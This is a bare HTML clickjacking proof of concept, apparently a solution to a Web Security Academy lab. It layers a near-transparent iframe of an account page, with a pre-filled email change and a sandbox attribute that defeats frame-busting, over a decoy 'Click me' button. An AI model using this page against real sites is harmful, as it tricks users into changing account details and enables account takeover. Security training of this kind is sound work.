<head>
    <style>
        #target_website {
            position:relative;
            width: 1500px;
            height: 900px;
            opacity: 0.0001;
            z-index:2;
            }
            
        #decoy_website {
            position:absolute;
            width: 1500px;
            height: 900px;
            z-index:1;
            }

        #decoy_website button {
            position: relative;
            background-color: brown;
            width: 122px;
            height: 35px;
            top: 480px;
            left: 196px
            }
    </style>
</head>
<body>
	<div id="decoy_website">
	    <button>Click me</button>
	</div>
	<iframe id="target_website" src="https://0a4600ed04e451ebc06720f1007f00b8.web-security-academy.net/my-account?email=example@example.com" sandbox="allow-forms">
	</iframe>
</body>